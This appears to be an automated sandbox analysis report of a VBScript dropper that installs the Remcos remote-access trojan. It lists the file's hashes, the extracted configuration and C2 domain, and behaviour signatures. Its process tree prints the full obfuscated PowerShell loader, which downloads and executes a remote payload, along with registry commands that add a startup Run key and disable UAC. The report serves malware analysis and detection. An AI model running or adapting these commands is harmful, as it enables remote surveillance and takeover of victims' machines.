Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-11-2024 06:15

General

  • Target

    a.vbs

  • Size

    16KB

  • MD5

    e6c723d6a40150466aa011158c68e591

  • SHA1

    f18348ee740329c6cb706123b34151dde9197b50

  • SHA256

    969d4f51528c1a62de42fd8dfc0efaf09b1857426add53376a3e2db14456a173

  • SHA512

    c9c85c17c329267d8dbed3441baa63c85cbd0abbad858dfd86632de8cd97b461d8f36c4b4fbd126712cd2664ba1e6bd2eece30fb090b9ff462ac4c052b204256

  • SSDEEP

    384:X+7h2tykhjtUXkNaaYtydrEVql1UnqCrP0z9CW6fz83W4u8b:GUtbto31+rOqcnqCrMZuA3nb

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jwdtcx3kfb.duckdns.org:47392

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-JY1QRO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4456
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aabeskyttelseslinien% -windowstyle 1 $Banegaardenes=(gp -Path 'HKCU:\Software\Crinums\').Checkkontoens;%Aabeskyttelseslinien% ($Banegaardenes)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:844
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aabeskyttelseslinien% -windowstyle 1 $Banegaardenes=(gp -Path 'HKCU:\Software\Crinums\').Checkkontoens;%Aabeskyttelseslinien% ($Banegaardenes)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2840
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4832
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:488

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    102B

    MD5

    e7faf4be0c69bfce124f394635f17c21

    SHA1

    af4039311b87c96144e8bda73d31af9a0cbb34b7

    SHA256

    f08109935a97655d3e133cc7367f566ccbec196696b38c0a889c2f43b66a7253

    SHA512

    95a116f56c54b22cbc8adf1d0d7e7f6d96782c2497d47772adaccd9fced5a215991de22c8016ee03e923561f89b0d05cb89e115df3afbc04ef493585df41503d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    b64fb21b9afc6a00d45a8edfcfa0d818

    SHA1

    eab2a200a5a16b67ef48c171d85593ecbd182e75

    SHA256

    9136a9dc540e95c074d66d0ddd143054070359925d2b72f1a5e212577d738345

    SHA512

    f4684faadaddfe434449199f58c9c4f9811ab71bd33454874fd3088f2209e26b7eee8efbebda4a3e9a040702687906c249fd01564222105c1c3717268da8c96b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mh2huaot.q2f.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Benzinmotorernes218.Gna

    Filesize

    475KB

    MD5

    295c44d32a59cd7721867d53a2e08e74

    SHA1

    b8359e0cdbf75e98d9e2abc64007219386d71c13

    SHA256

    bd1cf04c594f0a47c0945d215d5d04e8c64555857673e4dd3e7f2d1ae6d8627b

    SHA512

    fe894a5b177a8d69fc4bfe96e627015cc0da548b564bbe46eeed6149306025c93a596fa014328067bdd74f742f7251659027c13ec98787758cca017f70ed9c1b

  • memory/2228-62-0x0000000005F10000-0x0000000005F76000-memory.dmp

    Filesize

    408KB

  • memory/2228-77-0x0000000007810000-0x00000000078A6000-memory.dmp

    Filesize

    600KB

  • memory/2228-58-0x00000000050D0000-0x0000000005106000-memory.dmp

    Filesize

    216KB

  • memory/2228-81-0x0000000008FD0000-0x000000000B124000-memory.dmp

    Filesize

    33.3MB

  • memory/2228-60-0x00000000056B0000-0x00000000056D2000-memory.dmp

    Filesize

    136KB

  • memory/2228-79-0x0000000008A20000-0x0000000008FC6000-memory.dmp

    Filesize

    5.6MB

  • memory/2228-78-0x00000000077A0000-0x00000000077C2000-memory.dmp

    Filesize

    136KB

  • memory/2228-61-0x0000000005EA0000-0x0000000005F06000-memory.dmp

    Filesize

    408KB

  • memory/2228-76-0x0000000006AE0000-0x0000000006AFA000-memory.dmp

    Filesize

    104KB

  • memory/2228-75-0x0000000007DF0000-0x000000000846A000-memory.dmp

    Filesize

    6.5MB

  • memory/2228-74-0x0000000006600000-0x000000000664C000-memory.dmp

    Filesize

    304KB

  • memory/2228-73-0x0000000006570000-0x000000000658E000-memory.dmp

    Filesize

    120KB

  • memory/2228-59-0x0000000005770000-0x0000000005D9A000-memory.dmp

    Filesize

    6.2MB

  • memory/2228-71-0x0000000006030000-0x0000000006387000-memory.dmp

    Filesize

    3.3MB

  • memory/2524-94-0x0000000000E30000-0x0000000002147000-memory.dmp

    Filesize

    19.1MB

  • memory/4456-29-0x00007FF9A8C80000-0x00007FF9A8C96000-memory.dmp

    Filesize

    88KB

  • memory/4456-53-0x00007FF9A8F10000-0x00007FF9A8F25000-memory.dmp

    Filesize

    84KB

  • memory/4456-48-0x00007FF9A61F0000-0x00007FF9A6200000-memory.dmp

    Filesize

    64KB

  • memory/4456-45-0x00007FF9B2340000-0x00007FF9B2367000-memory.dmp

    Filesize

    156KB

  • memory/4456-44-0x00007FF9B4750000-0x00007FF9B4778000-memory.dmp

    Filesize

    160KB

  • memory/4456-42-0x00007FF9B1E90000-0x00007FF9B1EA5000-memory.dmp

    Filesize

    84KB

  • memory/4456-39-0x00007FF9ACC00000-0x00007FF9ACC0A000-memory.dmp

    Filesize

    40KB

  • memory/4456-38-0x00007FF9AE210000-0x00007FF9AE21C000-memory.dmp

    Filesize

    48KB

  • memory/4456-35-0x00007FF9AE330000-0x00007FF9AE349000-memory.dmp

    Filesize

    100KB

  • memory/4456-51-0x00007FF9ABAC0000-0x00007FF9ABADB000-memory.dmp

    Filesize

    108KB

  • memory/4456-26-0x00007FF9B25E0000-0x00007FF9B268C000-memory.dmp

    Filesize

    688KB

  • memory/4456-57-0x00007FF9B4C80000-0x00007FF9B4D22000-memory.dmp

    Filesize

    648KB

  • memory/4456-49-0x00007FF9A80B0000-0x00007FF9A80E0000-memory.dmp

    Filesize

    192KB

  • memory/4456-47-0x00007FF9A69D0000-0x00007FF9A6A52000-memory.dmp

    Filesize

    520KB

  • memory/4456-52-0x00007FF9A9170000-0x00007FF9A9182000-memory.dmp

    Filesize

    72KB

  • memory/4456-46-0x00007FF9A3DF0000-0x00007FF9A3E14000-memory.dmp

    Filesize

    144KB

  • memory/4456-43-0x00007FF9B4710000-0x00007FF9B4747000-memory.dmp

    Filesize

    220KB

  • memory/4456-41-0x00007FF9B3DF0000-0x00007FF9B3E91000-memory.dmp

    Filesize

    644KB

  • memory/4456-40-0x00007FF9AD4E0000-0x00007FF9AD561000-memory.dmp

    Filesize

    516KB

  • memory/4456-50-0x00007FF9ABAE0000-0x00007FF9ABAF7000-memory.dmp

    Filesize

    92KB

  • memory/4456-37-0x00007FF9B3AF0000-0x00007FF9B3BD7000-memory.dmp

    Filesize

    924KB

  • memory/4456-32-0x00007FF9AE360000-0x00007FF9AE46C000-memory.dmp

    Filesize

    1.0MB

  • memory/4456-36-0x00007FF9AE570000-0x00007FF9AE58E000-memory.dmp

    Filesize

    120KB

  • memory/4456-33-0x00007FF9B3AC0000-0x00007FF9B3AED000-memory.dmp

    Filesize

    180KB

  • memory/4456-30-0x00007FF9B43C0000-0x00007FF9B4427000-memory.dmp

    Filesize

    412KB

  • memory/4456-31-0x00007FF9A80E0000-0x00007FF9A8115000-memory.dmp

    Filesize

    212KB

  • memory/4456-23-0x00007FF9A56C0000-0x00007FF9A580F000-memory.dmp

    Filesize

    1.3MB

  • memory/4456-28-0x00007FF9B2370000-0x00007FF9B237A000-memory.dmp

    Filesize

    40KB

  • memory/4456-24-0x00007FF9A6DF0000-0x00007FF9A6DFC000-memory.dmp

    Filesize

    48KB

  • memory/4456-54-0x00007FF9A8EF0000-0x00007FF9A8F0F000-memory.dmp

    Filesize

    124KB

  • memory/4456-55-0x00007FF9A4830000-0x00007FF9A4844000-memory.dmp

    Filesize

    80KB

  • memory/4456-25-0x00007FF9B41B0000-0x00007FF9B41F2000-memory.dmp

    Filesize

    264KB

  • memory/4456-56-0x00007FF9A4F10000-0x00007FF9A500A000-memory.dmp

    Filesize

    1000KB

  • memory/4456-22-0x00007FF996B90000-0x00007FF997652000-memory.dmp

    Filesize

    10.8MB

